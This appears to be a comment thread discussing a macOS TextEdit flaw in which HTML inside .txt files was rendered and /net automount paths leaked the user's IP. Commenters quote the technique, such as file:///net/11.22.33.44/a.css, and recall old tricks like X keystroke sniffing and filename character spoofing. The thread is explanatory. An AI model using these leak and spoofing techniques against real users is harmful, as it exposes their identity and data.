Oh, man. The idea that TextEdit automatically parsed .txt files as HTML if they started with a certain file signature is problematic...
...but the fact that file:// schemes can access remote files by appending /net/ followed by a domain name is pretty shocking.
I mean, the entire purpose of "file://" would seem to be to provide access to local/mounted files and only those.
The fact that a Mac engineer thought it would be a great "feature" to allow file:// to access the entire internet is... kinda terrifying. Did that get patched, or was it only TextEdit?
> ...but the fact that file:// schemes can access remote files by appending /net/ followed by a domain name is pretty shocking.
Not that shocking. Windows has had that with SMB networking for ages file://SMBSERVERNAME/path/file . Linux somewhat supports /dev/tcp/HOSTNAME/PORT (technically that's application level in bash so not everywhere), and im sure there's daemons you could run to automount things on the fly.
> Linux somewhat supports /dev/tcp/HOSTNAME/PORT (technically that's application level in bash so not everywhere), and im sure there's daemons you could run to automount things on the fly.
Do note that this has been disabled in the major distributions at compile time for pretty much ever. The debian bug to build bash with that feature by default is ~20 years old (and was closed as wontdo).
Except permissions aren't granular enough / are too confusing, it's a giant footgun with the current Linux architecture, which doesn't have all the nice things Plan9 does
I didn't say that the everything is a file philosophy is necessarily correct and well implemented on Linux. Merely that if you where to continue along this direction it would seem like a logical next step. I don't think I would use this for anything but for shell scripts at best. However especially if you are a plan 9 fanatic then it would seem like quite a good idea which is what the original question was.
I'm no specialist but I'm inclined to disagree, for me it's the difference between the ability to run an arbitrary binary and the ability to read/write an arbitrary filepath
SMB is more understandable though, since you have more trust for things on your local network, and an attacker usually won't have control over those resources. And it's a fairly common and reasonable expectation in a business environment that network drives appear as part of the filesystem.
Whereas a domain name over the open internet is an entirely different story.
Actually if I am not mistaken it is after they want to fight the browser war they break the barrier between the file system and internet system. It is not in the early version of windows or IE. the integration is one of the major mistakes Microsoft made. And surprise apple fall for it as well.
Can’t trust these two or ,,, who can we trust for network security.
Most likely nobody decided to have file:// access the network. Most likely, someone decided to make file:// the scheme for accessing files, and someone else decided to mount the network as a file.
It's not specific to the file:// URI scheme; /net is an actual filesystem path that works with anything that accesses paths. Or used to work, anyway; it was recently changed to be disabled by default.
> In Unix everything is a file. Files are files, folders are files, disks are files, your keyboard is a file, your mouth is a file, the air is a file, you can't breathe, your file lungs fill with files and you try to scream but only files come out oh god Dennis how could you do this
How is that? Per-process namespaces in Plan 9 seem like a good idea for isolation. "Everything is a file," but what is and isn't accessible can be managed on a per-process level.
In POSIX we only generally get a user/group level of granularity which seems to practically mean that only daemons are completely isolated.
I disagree. Use a second process that has a limited namespace where you've mounted only the local files you want an HTML document to be able to refer to and an IPC socket marked for exclusive use. The first process resolves file links and reads file contents via IPC to the second process.
In the article, the remote file's contents were not malicious, but merely trying to access it was. That would require a very different security posture to "assume all files are malicious".
I don't think "everything is a file" is necessarily bad. What's worse is "every application I run has access to every resource that the OS gives my user access to".
Would be nice if the operating system could set up a fresh, temporary "user" for each application installed, and instead run the application as that user, who starts out with no access to computing resources. Maybe some existing systems already sandbox apps into their own unprivileged users, I don't know, but it would probably be very secure.
Modern operating systems can; there is quite granular control.
But often when such sandboxes are attempted, it turns out that it often became more complex than originally thought, and applications need many resources which were not originally considered, so they are given those resources, and very often those resources can be used again to construct more resources or otherwise to some measure escape the sandbox.
> perhaps this is the worst possible abstraction to be protected by a security framework.
I honestly don't understand how anyone with at least a basic understanding of how OSes are designed and operated could ever arrive at that conclusion. The layers of wrong assumptions required to support that assertion are in the level of "not even wrong" confusions.
I fail to see how HTTP and REST's "everything is a resource" paradigm is significantly different than UNIX's "everything is a file" paradigm, and I'm yet to see anyone claim that the freedom and power to open any HTML document (OMG a file!) made available through the internet is a mistake or a bad design decision.
Several ways. In Unix files are streams of bytes. In HTTP resources are complex entities with MIME types, multiple representations, encodings, etc. HTTP URL structure supports parameters and there is a method for providing data and obtaining a result back, a sort of RPC.
On the other side Unix has users and permissions, HTTP does not and you have to build your own.
Looking in /etc/auto_master, which is the configuration for Autofs, the /net mount point is commented out by default. I do not know when (or if) it was ever turned on by default.
I'm stilling running Mojave (10.14.x) and it is uncommented. The file dates to 2014 so I suspect it was set up with the original OS that came with this machine.
A file can be accessed locally, on a private network, or over the internet. The fact that /net/ exists is redundant to http file download... so there's an argument there, but to access a local network file through http requires a webserver which may not be desired. So, having file /net/ solves that problem but of course could work the same way on an internet network so... we're kind of screwed really.
File extensions are routinely used by all sorts of software, at least as hints if nothing else. For example, gcc will handle files named .c differently from files named .cpp, and will not even work with static libraries unless they are named .a.
It's always seemed strange that an application called TextEdit is actually more than a text editor. I strongly believe that content-type autodetection, much less HTML rendering(!), most certainly does not belong in a text editor.
Here's an interesting quirk in Windows: There are two APIs to execute external programs, CreateProcess and ShellExecute. CreateProcess is the older of the two and only runs executables. ShellExecute opens the target with whatever app is associated with the extension.
When they shoehorned the ShellExecute behavior into cmd.exe, they basically just said "if (!CreateProcess(foo)) {ShellExecute (foo)}"
As a result, if you take "foo.exe" and rename it "foo.txt" then try to run it like "C:\>foo.txt" from the command line, it will run as an executable instead of opening in Notepad like you would expect. Do the same with a real text file (that doesn't start with "MZ") and it opens in Notepad.
This is a frustrating behavior on Windows, not because it's possible, but because it's default. I vastly prefer the way KDE performs. Whatever the default program to open that file type is attempts to open it. You can easily change what the default is.
It's frustrating when I instinctively change a file extension on Windows so I can do some other operation with it (say changing a configuration file to .txt to edit it) and Windows still doesn't know what to do with it.
I'm not averse to the behavior, I just wish I could control when it happens.
It's a rich text editor by default. Rich text is still text.
Opening HTML files and converting them to rich text certainly does belong as a valid feature for a rich text editor. It'll open and convert Word files too, which is super useful.
The content-type autodetection, however, I agree was a bad idea. Still, this vulnerability presumably existed with an .html file opened in TextEdit.
I assume the content-type autodetection exists because of how downloading files occasionally appends a .txt extension (I think this is when the content type is text/plain). Postel’s law gets applied with the result of macOS attempting to make up for misconfigured servers.
If the file extension is .txt, I always expect it to be opened as plain text. The file extension is, rightly or wrongly[0], the metadata declaring the file type — nobody would consider it reasonable for an .exe to remain executable if the extension is changed to .txt, after all.
One might, possibly, still argue about the text encoding of a .txt file (I’m old enough to remember Unicode being a new fancy alternative to ASCII), but that’s about it.
> If the file extension is .txt, I always expect it to be opened as plain text. The file extension is, rightly or wrongly[0], the metadata declaring the file type — nobody would consider it reasonable for an .exe to remain executable if the extension is changed to .txt, after all.
That statement is quite wrong and shows a good dose of ignorance. To start off in UNIX systems the extension means nothing regarding whether a file is an executable or not. All it takes is a +x flag and a file format (header, magic number) that can be executed.
Also, file extensions mean nothing. In fact, a popular and very basic trick to fool clueless users to run malware (and one which any anti-malware tool checks) is to sneak executables with a different extension, because it only means something to clueless users.
And a file with a txt file extensions means nothing at all. The only thing that matters is the file content and it's file permissions.
TextEdit dates back to NeXTStep, so it was originally written in the late 1980s probably. Guessing it didn't render HTML originally, but it always had RTF capability. Not that it's an excuse in 2021, but very few applications from that era woudl be considered "safe" today.
Edit.app is the original NeXTSTEP text editor from the 1989. It supported plain text and rich text files. Famously, the first web browser was based on the rich text capabilities built into NeXSTEP.
TextEdit.app is the OpenStep rewrite of Edit.app and dates to the mid 1990s. It was likely one of the first OpenStep apps. It supported the same rich text files as the original Edit.app.
Apple bought NeXT, OpenStep became Cocoa, TextEdit was ported to Java, and then back to garbage collected Objective-C, then ARC Objective-C, (then Swift, probably).
Along the way it picked up features for reading/writing/editing HTML and Microsoft Word documents.
Apple used to publish the source code for TextEdit as part of their Xcode sample code, but they stopped a few years ago.
Java was supposed to be the primary programming language for OS X. That's why they renamed OpenStep to Cocoa (Java and Cocoa go great together).
But AppKit was still pure Objective-C, and bridging between AppKit's Obj-C APIs and the Java language presented problems. 3rd-party developers (eventually) preferred the write directly in Objective-C and Apple dropped the Java bridge some years later.
NeXT used Display PostScript for the display manager. If you opened an email that had PostScript commands, the mail agent would happily, automatically, execute them.
A favorite payload sent around the computer lab would smear all pixels downward to "melt" whatever was rendered on your display.
Note that there weren't that many interesting things to exfiltrate back then, so this wasn't a terrible default: there wasn't (any!) online commerce, online banking was rare, and even passwords were never echoed to the terminal.
You don't need a password to be echoed to exfiltrate it. You just need the key codes. Not sure about NeXTStep, but regular old X let you sniff keys really easily.
Some systems (specifically, earlier versions of SGI IRIX) shipped with X authorization disabled by default. This is the equivalent of "xhost +". You could sniff a box as soon as it was plugged into the network, including capturing login session credentials, all terminal commands, and anything else. When they su'd to root, yes, you'd capture the root password.
In those days (mid 90's) almost nobody was running firewalls. At least, nobody in these parts. Putting your "office on the Internet" meant raw, unfiltered IP.
According to you. I appreciate that TextEdit is a rich editor. I can use vim or countless other apps for plain text. Few do what TextEdit does with its simplicity.
Neither is the opinion that "This problem exists because someone wrote a tool that should only do one (really well) and but instead made it do five different things."
You can make security bugs in simple tools - this security bug is not purely a function of the number of target use-cases.
Nor do you have any rational basis for asserting that the given app "should only do one [thing]".
>>Anyone with networked filesystems, I should imagine?
You're either missing the point made by GP or being disingenuous. Please keep in mind that you need to explicitly mount a NFS before you're able to open it, and mounting a NFS not only requires explicit authorization but also only provides access to a specific file system mounted in a specific point following specific permissions.
Accessing the whole internet through file:// without being prompted for permissions or consent or even awareness is an entirely different thing. For starters, the access is not explicit nor subjected to conditions.
Rigidly interpreting documents depending on their file extension is worse than trying to figure out the type of a document before interpreting it. File extensions are a brittle and primitive system that does not fix any security issue.
Optimizing for "simple" for the sake of robustness is exactly backward.
> visible and understandable
False. Something is neither visible nor understandable if it's misleading - which file extensions are. There are absolutely no guarantees that a file extension will match file contents, and that assumption can cause security risks - like in this article.
An actually good alternative is to encode file type as metadata, instead of inside the file contents or file-name, and then configure viewers to display it. That, while not "simple", is also visible and understandable to the user, while simultaneously being safe.
> There are absolutely no guarantees that a file extension will match file contents, and that assumption can cause security risks
Only in software that ignores the extension.
> An actually good alternative is to encode file type as metadata, instead of inside the file contents or file-name, and then configure viewers to display it. That, while not "simple", is also visible and understandable to the user, while simultaneously being safe.
Metadata can be just as wrong as a file extension, and is generally far less visible.
The problem is that the text editor ignored the extension of the txt file. That's what lead to unsafe behaviour - the user thought the file was fine to open because the extension was txt, and improving users is not practical.
The exact same thing would happen with metadata - indeed file extensions are just a form of metadata - if the metadata says this is a text file but the application ignores it, we would have the exact same issue.
> They are also trivial to get wrong, can be mangled when the files are moved around, and are easy to use as an attack vector.
On the contrary, they're the only kind of metadata that doesn't get mangled when files are moved around, and they're far less of an attack vector than other approaches. Of course you can set the wrong file type, but no approach avoids that problem.
If you don't want text editors to do non text-editing stuff, then people need to stop saying we should build development environments around text editors. "An IDE is just a text editor with bells and whistles", people say. Well if that's the case, it's not surprising if people "only ship the one text editor".
But not with file extensions of .txt. They should only do bells and whistles if the extension warrants some bells. .md, sure syntax highlight me. But opening .txt and treating it as html, that seems strange.
Well, on Unix file extensions are a convention and don't have any strict semantic meaning. Maybe this doesn't make sense in a world where most people do think in terms of file extensions (thanks to the popularity of Windows) but it shouldn't be surprising that non-Windows programs might not special-case file extensions.
(Though in fairness, text editors do usually have special casing for file extensions and these days tools like ls will colour filenames based on the extension.)
This is only a Unix vs Windows thing in terms of the application launcher and how it is implemented. File extensions are semantically meaningful for many unix tools, most notably gcc.
I don't know anyone who says that an IDE is just a text editor with bells and whistles. Visual Studio Code is a text editor with more bells and/or whistles than a choo-choo train, but that doesn't make it any more of an IDE than nano and termux.
It compiles and debugs, that seems like an IDE to me.
VS Code is cool and all, but it definitely is a lot more manual and laborious than VS. the tooling and automation in VS is missed if you’re used to it.
Yesterday grep didn't work because it 'autodetected' that the target file was a binary.. So I 1) cursed whoever made this non backward compatible change 2) used man to find the '-a' option..
Hah, looks like I’ve been needlessly typing quite a few extra keystrokes, as I’ve always done —binary-files=text. I should have looked at the man page more closely..
It can do some sketchy things and rewrite your terminal in weird confusing ways, but afaik most of the out-and-out malicious escape sequences have been patched out at least a decade ago.
Any vulnerability in the escape sequence handling of the terminal emulator, and conceivably, depending on what sequences your terminal supports, access to facilities like local file generation or clipboard contents. There have been a number of issues with escape sequences injected into things people might copy and paste from a web page, or in git commit histories, that have done nefarious things.
I think this captures my sentiment on the matter as well. Applications today want to be a swiss army knife and do just about every job.. and do it poorly. I do expect that level of complexity from RStudio, but probably not from Notepad. I would probably kinda accept it in Notepad++.
So real question. Is TextEdit a default text editor in a mac?
File extensions are a kludge anyway. (And Windows 10 still hides them by default, because hey, backwards compatibility, and you wouldn't want to confuse Grandma who's seen the file be called "grandkids" since Windows 95..).
Why should the filetype be dependent on the name? People even think renaming a .BMP to .JPG means now it's a compressed file!
Old school Macs stored the filetype outside of a file, so you can rename the file "grandkids.mp4" and double-clicking it would still open it in the image viewer.
Not really outside. The metadata was stored in a so-called "resource fork", with the file contents proper in a "data fork", both of which belonged to the file per se. Part of the resource fork was the "creator code", four bytes identifying the application which had created or could open the file, and the "type code", four more bytes defining which, among the potentially many kinds of files a given application could open, this file actually was. Binaries were stored in the same format, with IIRC an extra bit somewhere flagging them as executable.
Classic Palm OS used an identical scheme, and for both platforms there was a freeware "ResEdit" application you could find to let you edit resource forks without paying for a real developer toolkit.
Yes, and it sounded great on paper but was horrible for interoperability because a file was not self contained from the POV of filesystems that didn't support the resource fork. Every file you wanted to distribute cross platform needed 2 versions. One with all that metadata bundled up for Mac, one without it for everything else. It was a nightmare
>I understand why they would do it, but it makes you wonder how much better our systems could be if it weren't for concerns about legacy.
Concern for legacy is the only thing keeping the field of computing sane these days. If every operating system worked with radically different standards for basic things like filesystems, a significant amount of bespoke work would need to go into each build of every piece of software, and we could very quickly encounter a monopoly scenario where only the rich could afford to develop apps for everyone. All of this is not to say that there aren't already systems doing this: Haiku and Plan-9 are about as esoteric and non-conformant as they get, and their reward for that is a minuscule but dedicated userbase. If Apple wants to make the computer a better experience for the end user, then they're going to have to play ball.
> This makes me sad - it was dropped because of problems with other operating systems, not because it was necessarily a bad architecture.
No, it was dropped because it was designed without enough forethought given to how that metadata would be transmitted over the wire or when multiple files were bundled consistently. Even if every OS used this scheme a better solution to these problems would have to have been devised.
Are extensions perfect? No, they suck. But yet solve this metadata transfer problem "good enough" and therefore won the war.
PS - There was also a lack of user management tools/feedback on a lot of systems, for example changing the "file type" was often impossible out of the box, and the file types often unclear unless you went into details/properties on purpose (a potential security headache, up there with hidden extensions ala Windows).
Microsoft removed the file type manager in Vista(?), so it's no longer as simple to change what software opens arbitrary file extensions. You now need to have a file with the extension you want to change the default for, use 'open with', and check the 'use by default' button. If you want to change a bunch of file types by copy/ pasting exe path, sorry, you can't do that without editing the registry. And the new method of changing programs that open groups of file types (ie documents or html), the program you're running needs to be registered as something that can do so, or it won't appear in the list. Want to change all image formats except gif (jpg, png, tiff, bmp, wmf, emf, and so on) to a different image viewer? Your options are to change them all then change gif back, or to change them individually.
I think there's a location in the new settings for listing all file type associations, but it still doesn't allow copy/pasting paths for multiple fast modifications. If you want to change the name of a file type as it appears in the file type column in explorer, or want to change the icon used for a type of file to something other than that of the application used to open it, that's no longer possible without editing the registry.
Yeah, it was painfully overcomplicated for sure - Palm OS did it much more seamlessly for cross-filesystem interop, but it was only when SD cards and /Palm/Launcher came along and you didn't really need Hotsync any more that it really got comfortable. It was very much of its time and I don't regret that it's gone, but it was certainly a clever and interesting design.
I was in my tweens/early teens when I learned about ResEdit. I thought it was some kind of hacker tool, and I was amused at the various things I could change.
I used to add menu items (that didn’t do anything), I was able to change picture/icon resources inside apps, all kinds of fun stuff. Change command mapping, etc
Changing app icons was the big thing for me. I learned about that as a tiny child at computer camp, and I thought the high school kid who introduced me to it must be just about the coolest guy in the world.
On the contrary, it's a simple and explicit (when not stupidly hidden...) way of denoting the file type, which is great for interoperability and information interchange.
Proprietary, opaque mechanisms like resource forks only serve to keep users uninformed (and thus unlearning) and impede the free interchange of information between different applications.
I don't actually think file extensions are such a bad system.
Filenames exist to provide context for the data inside. "Draft 2020 Quarterly Report.txt" and "Draft 2020 Quarterly Report.csv" could contain the exact same data, but the file extension indicates how the file is intended to be used, just as "2020" indicates the relevant year and "Draft" indicates completeness.
The cool thing about the Classic MacOS file type/creator system is that you what app opened a file was not dependent solely on the file type, but also on the app that created it.
So if you downloaded a GIF file of a cute cat, it would open in your image viewer, but if you were working on drawing your own GIF image, it would open up in your image editor.
But we have file timestamps, permissions and other attributes. There could easily be a "file type" field too, that seems more natural than shoving this metadata into the title.
As I see it, a timestamp is "non-negotiable". The file was last modified on April 22, 2001. There's no difference of opinion, the time is what it is.
But the file extension partially reflects a user's intentions. A stylesheet named "style.css" is intended to be used by a browser directly, whereas one named "style.scss" is expected to go through a preprocessor, but the two might have the exact same contents, and I might decide to just change one to the other, and that's okay.
I take your point about permissions, which are expected to be set by the user. Of course, I actually run into problems caused by incorrect permissions all the time. Maybe it would be better to encode those in the file name! (Although I don't know how you'd do it without creating a mess, and potentially security issues.)
In the age of the internet, file extensions are a good idea, they should be visible by default, and people need to learn to recognize them. There's a lot of malware that gets people to run it by being an executable with an icon of an innocent file type, like an image. If you don't see extensions, you have no idea it's an .exe instead of a .jpg.
It would be kind of neat if changing the extension of a file caused it to be converted automatically. It would save a bunch of typing and browsing around. Just rename a directory to foo.tar.gz and it gets compressed and tarred. I'm not saying that the kernel should be doing that, but it feels like a nice abstraction for some UI.
This is one of those ideas that seems nice in theory but in practice would just lead to so many subtle problems especially if it happened automatically.
Lots of programs create temporary files by changing the extension temporarily but if the kernel were attempting to intercept and change the internal data you could never guarantee the state of your file data. Not to mention potentially renaming an extension to an automatically handled extension and having that data irrevocably altered without you even realizing it.
Then of course there's the fact that there are usually lots of options associated with converting a file. Jpg needs visual compression levels, mp3 needs bitrates, etc.
But why tar it in the first place? If you want to share a directory, the system can tar it for you behind the scenes. Also, the system can zip anything behind the scenes, without the user knowing.
I guess it would make sense if you want to archive it and save some disk space. It also not always clear to the system that you are sharing a directory, if you drop it on a network drive, for instance. But yes, I think zipping a directory is not the most compelling use case.
I do remember resource forks, but I thought content-detection was also a generally accepted pattern on 90s-era Macs because of the lack of file extensions?
(If you had a safe content-detection code-path -- admittedly a harder thing to guarantee these days -- that could certainly be safer than relying on users to not "open grandkids.bmp.exe" or "rename a downloaded.txt to autoexec.bat".)
i always found that a bit funny to see the 'typing' hygiene vary between OSes just like between programming languages. Windows let you cast anything, MacOS.W had the application being the sole type constructor in a way. Very functional.
They’re also dangerous too! I remember seeing malware as an attachment to an email with the file name “somefile.exe.bmp”, which looks safe, but when saved on Windows, it saved it to disk as “somefile.bmp.exe” because there was some Hebrew character that flipped the last two extensions around!
Meta comment: The custom scroll behaviour on that site is awful. I hate sites that try to "improve" the behaviour of scrolling by making it faster/slower than normal.
I've been racking my brain trying to figure out just what "benefit" is had by this type of scroll-jacking but to no avail. It does seem to help in any way and all it does is frustrate the user.
Luckily the spacebar behaviour remains untouched, but you shouldn't have to experiment with each and every snowflake webpage just to have the default actions act as you would expect.
It's not the author's fault necessarily. Well, they _did_ choose the template and decided to keep it. But the template comes from a company who targets WP templates towards Female Entrepreneurs, most likely in a bid to win some slice of Google's keyword share with "Feminine Blogger Templates". Not sure what my point is, except that maybe they are incredibly out of touch with a lot of things these days. And I'll it there. This is turning into an unintended stream-of-though rant. Sorry!
Which is very interesting in and of itself as that's not how dangaling markup attacks usually work (normally it would send the unparsed html, not the result of parsing the html). Not to mention wtf the non-standard <iframedoc> tag is and how it differs from an iframe.
But my broader point was less the how, and more that the style of writing was obnoxious.
There are a lot of ways HTML can leak information. HTTPLeaks is an attempt to create a test for all such leaks. Unfortunately, people keep inventing new ways for HTML interpretation to leak data. The article describes a particularly clever approach accidentally implemented by Apple.
I don't know what people expect - don't run code you don't trust. There is also lots of ways for python to leak data if you execute a malicious python script.
It's not about running code, it's about opening a TXT file with the operating system default handler for TXT files.
So you what you are saying is basically 'do not open any files or websites you don't trust' - which is usually not what people expect as that would basically mean 'don't use your computer'
More specificly im saying, the web is designed around making network requests. If your threat model is not to make network requests, you shouldn't try and sanitize html vis blacklists because you'll be in for a bad tine (responding to the grandparent's list of html leaks not the article. I agree that its unreasonable that the txt file does anything. The mistake is in the apple devs trying to sanitize html which is doomed to failure)
The bug is fixed now, as the articles notes at the end. I cannot reproduce this at all now. When I put HTML in an actual .txt file, TextEdit opened it showing the markup, not the rendered content. This is regardless of whether in Preferences, I check or uncheck "Display HTML files as HTML code instead of formatted text" checkbox.
It would only leak your real IP if you were using a proxy through your browser, right? If you were using a VPN it would give the VPN server's IP address?
edit: comment hidden, probably due to new account. Leaving it up just for reference
Well, /net is entirely disabled by default as of recently, so this entire method is no longer applicable.
However, since you asked, here is some useless information:
With /net or remote filesystems in general (NFS and SMB), the network accesses are performed by the kernel directly, rather than by the application using networking syscalls. Therefore, sandboxing network access from specific applications won't affect it.
Big Sur doesn't actually have a permission dialog for network access. But TextEdit does use the (long-existing) App Sandbox system, which is based on applications statically declaring permissions they need. Since TextEdit doesn't request a networking entitlement, it's prohibited from accessing the network directly; as I said, that doesn't include remote filesystems.
From the OP it sounds like there is a very weird feature/component in MacOS called "AutoMount" and/or "AutoFS" that lets HTTP GET network requests be made via reading file system locations... and it may somehow escape other access controls?
I too am curious for more details about this. Where did this feature come from, how has it been used, has it actually been used?
Is AutoMount/AutoFS still there after this CVE patch? Does it indeed circumvent Access Control or other such things? Is it a likely path for other security problems?
The only thing I know about this is what I learned from the OP reporting the vulnerability. Maybe I was mistaken the request was HTTP? Anyway, rest applies, assuming the article is correct in describing the nature of the vulnerability.
Anyway, if this is how TextEdit got around macos access controls related to network activity, I wonder if this is a route for other apps, including malicious ones, to get around it too?
> After digging into OSX internals, I came across the AutoMount feature that lets file:/// urls make remote requests. AutoFS is a program on OSX that uses the kernel to make a mounting request to a drive. Automount can also make remote requests to an external drive. Doing 'ls /net/EXAMPLE.com' forces OSX send a remote request to EXAMPLE.com
> While they did a good job blocking TextEdit from making external requests, this was the one thing they forgot when they allowed file:/// scheme, on OSX file:///net/11.22.33.44/a.css connects to 11.22.33.44.
It’s not that weird, but probably less widely used now; it’s wrapped up with NFS - SunOS had this starting back in the eighties and it’s really handy.
You can also do much the same including HTTP access with UNC on Windows.
Both will follow normal network file access controls in their respective environments.
As for the why? It’s a really easy way of sharing resources between computers, and also way more efficient and easier to manage than static mounts.
> Man who thought TextEdit could be trusted as a plain text editor is wrong
This is one more example of what I find so frustrating about macOS, which is all those hidden little features trying to be "smart" and "user friendly" just in case I the user do not really know what I'm doing.
MacOS, too? That's a classic Microsoft kind of bug. At one point in the Windows XP era, Windows would execute anything that came anywhere near a desktop machine - USB sticks, CDs, web sites with install files... "Ease of use", right? They gradually tightened up.
Fascinating, I've always been annoyed when Textedit would open a .txt file and treat it as rtf/html. In retrospect that's a pretty obvious attack vector :/
For attachment handling there's really a need for a service that takes the file in light of the uploaded suffix and mime type, and normalizes or rejects it (in a sandbox) based on how safe for consumption it is for common apps that handle that kind of file. For normalization eg GhostScript can convert PDFs to PDF/A that contain no scripts, images can be recoded, etc. Open source project idea? Or is there something this lie this already?
So whenever the program used for extracting ZIPs has a vulnerability any website could force-download a malicious ZIP and it would automatically be extracted and trigger the vulnerability...
Why is "force-download" even a thing? IMO the browser should always ask before downloading any file. Though this is not a unique Mac thing, I believe Chrome does that everywhere.
> It seems TextEdit for some reason thought it should parse the HTML even while the file format was TXT. So we can inject a bunch of limited HTML into a text file, now what?
Well, what's a file type unless you know it from context, for example a special file system attribute that set to "text/html"? Heuristics. At the very least I think it's better to ignore file "extensions" completely when dealing with the data inside than to make it the deciding factor.
libmagic, which powers a lot of file(1)'s work, is called libmagic for several reasons.
haha, after using OS X since the beginning, i have never even looked for this. after the first time of realizing it was rich text like WordPad and not a text editor Notepad, I never even attempted to use it for anything text related. better app options were available for pure text anyways. BBEdit was my gold standard in the way back days.
I think both sound equally valid. One sort of expands to "a GUI editor for plain text" in my mind and the other is more like "a plain text editor with a GUI."
I too have been annoyed to not have a simple bundled paint program (I remmeber MacPaint!), but bundled application software is not really what determines whether an OS is a decent desktop OS.
I actually strongly disagree. Bundled applications which I don’t use and/or will replace with more powerful third party options just add clutter. There’s a balance to be sure, but I generally think OS’s bundle too many apps!
Why would the quality of an OS be determined by what apps come bundled with it? An OS is a different thing than applications, it's what the applications run on. I think you have an unusual viewpoint.
Because people generally want their computer to be usable when they buy it. Imagine if OSes did not include a text editor, browser, file explorer, settings app, wifi connection tool, etc. MS paint is similarly a very basic part of the standard toolset.
One of the big reasons I switched in 2007 was the absence of absolute dreck like Paint.exe on a Mac. Instead, Apple focused on providing other types of apps for free, and now macOS comes with a full office suite and a prosumer sound editing program as things Windows doesn't have on first launch. Out of the box, macOS offers so much stuff today it's kind of incredible.
You want to draw? Use Notes, which has very little but enough to draw a quick idea you just had.
mspaint.exe is as close to a perfect software as I have ever seen. I'm curious to know which program you think is better, because I'm sure very few exist.
You can’t really start with a blank canvas and fill it in. You can only edit an existing image. (Yes, if you can create an all white JPEG you’ve more or less reinvented paint.)
It can sort of hackily fill some extremely extremely basic functions (I know cause I do it too), but even that is pretty hacky, like how do you create a new blank document 800px by 600px to start painting on?
oh come on, how much more do you need than a crayon based color picker? ever set the date of your system to waaay into the future and then look at the crayon color picker? after providing that, what else could you possibly need?
just like a box of crayons. when they are new, all of the lables are crisp and clean, and the edges of the crayons are square/flat. after using the crayons, the tips become rounded, and you have to peel the labels back as the crayon wears down.
so does the crayon color picker. at least it did in older versions of the OS. haven't looked at it in a reallly long time, as it was def a gimmick more than function
Oh, what do you know, Apple is using the same shitty playbook that Microsoft used and outgrew off from 90's. Remember when opening and interpreting everything by default was the source of all kind of malware because Microsoft thought usability/convenience must trump security? I remember. Nowadays they toned that down: - no more macros enabled by default, no more default autoplay, no more automatically opening mail attachments in Outlook, and definitely Notepad doesn't interpret HTML tags within anything you threw at, including .html files.
To the author: This website seems to use something called SmoothScroll (edit: a javascript library) which makes my scrolling really really jumpy/janky. I'm using chrome on a MacBook with the touchpad. Made it basically impossible to scroll around the page which in turn made it very difficult for me to read the article.
"Please don't complain about website formatting, back-button breakage, and similar annoyances. They're too common to be interesting. Exception: when the author is present. Then friendly feedback might be helpful."
(Note: I'm not saying such things aren't annoying—it's the opposite—which is why we need a site guideline to prevent discussions from being dominated by them.)
Also to the author: This is most likely costing you readers.
Just weighing the pros and cons here:
Pro: People who don't have smooth scrolling mouses will suddenly enjoy smooth scrolling on this website. Even this is a questionable "pro". Most people have scrolling setup how they want it and don't need it fixed on a per-website basis.
Con: Degradating a core function of the computer (scrolling) for people who already have smooth scrolling.
So to summarize: The plugin is not helping anyone read the blog, but it is preventing/annoying many people from reading it.
It's not really rare. Chrome tends to be a bit more "adventurous" and experimental, while Safari and Firefox are a bit more conservative. So it's not uncommon to see a few weird issues show up in Chrome.
Messing with native scrolling as a web antipattern is right up there with interfering with copy and paste. I will never understand why people do these things.
My first web development job was for a Rails consultancy, where the owner of which explicitly stated that our apps were not designed to support using the back button. On another occasion, this same person responded to user reports of page zooming breaking the site with a counter of "then don't zoom the page".
These moments were two of the first wherein I strongly reconsidered whether I had made the right career choices.
the browsers cannot control a dev that uses AJAX to continually redraw the page without causing the browser to update the history/location. typically a sign of a) a dev new to AJAX or b) a solo dev that created a PoC that got turned into a product with very little thought about things like history/state/etc. I myself am an option B person.
Basically every single big site screws this up when lazy loading content - Twitter, YouTube, etc. If I drag down the scrollbar to position content where I want it on the page, invariably content gets loaded and pushed to the page. Because I am fixing the scrollbar by holding down the mouse button, the page jumps to a new position.
It is infuriating because this is solveable in many ways, the simplest being not to push during a mouseDown event.
But my new most hated thing is Google lazy showing details when I mouse over a result. Which means if I quickly go to click on the second link I mouse past the first link and it expands to the space where the second link was, so I either click the wrong link or have to reorient and then click the second link. I can't imagine how or why that feature exists.
I'm using Chrome and Windows10 but also got unpleasant behavior. I can't quite tell whats going on for multiple pushes of the scroll wheel but one 'tick' would push the page a set amount, and then a moment later the movement was repeated (but without the prompting input). Adds up to kind of a 'gross' overall feeling when scrolling.
EDIT: when scrolling with the arrow keys it looks like theres an attempt at 'smoothing' but it really feels more like inertia and damping and is pretty unpleasant.
That this behavior is called "SmoothScroll" is what pushes it over the boundary for me firmly into self-satire (and so I am in stitches playing from laughing so hard at your great description and then experiencing the actual behavior); who writes these scripts, and why? :(
Works fine on Firefox for me. On the other hand, the text is in a small and thin font, light gray on a white background making it unreadable on my screen. Reader mode to the rescue, once again.
I wonder if there is an Apple's backdoor to read users' text files when they open it and send saucier things to them. We will probably never know as this could be collated with other stuff and sent with metrics.
Small thing I do first when a new Windows has been installed: make the file association of .VBS and .JS files open with Notepad instead of wscript.exe[0]
Mitigates `iloveyou`[1] virus type attacks on my system
The response, for the longest time, from a lot of MacOS users was that "Macs can't get viruses." No thanks, in large part, due to Apple's own advertising.
This led to decades of bad online practices on the part of Mac users, thinking that by virtue of using an Apple computer, they were immune to such attacks they deemed exclusive to 'viruses.' Malware was for someone else, they'd argue. Because they don't get viruses, they were fine.
As a result, one of the largest botnets for a time was a MacOS one. Flashback.
The headline isn't needlessly dramatic. It's dramatic enough to prove a point. Bad habits and lack of safe file handling is the most guaranteed way one opens themselves up to attack vectors such as the one demonstrated in the article.
I disagree. Many of Apple's user-base believes that the platform is immune from viruses and malware. It's important to get the message out that it's no better (and may be worse) than other popular platforms. Especially since Apple claims their platform is "secure by design."
Safety by virtue of running MacOSX isn't enough anymore. Not that I'd argue it ever was totally safe/enough in the first place.
Bad habits are what subject one to attacks more than anything else... and that's basically what Apple cultivated in their users through ignorance of threat mechanisms.
>Bad habits are what subject one to attacks more than anything else... and that's basically what Apple cultivated in their users through ignorance of threat mechanisms.
This. 100 times this. The end user is the weakest link in your security chain, and the way Apple implements abstraction in MacOS makes it really difficult for the end user to understand what exactly they're doing, and what effect it has on their overall security.
Most of the safety has always been in being a minority platform, and consequently I don't think the threat level has really changed all that much over the past ten years. Apple are really hitting the gas right now with their SIP work and the immutable OS volume and such.
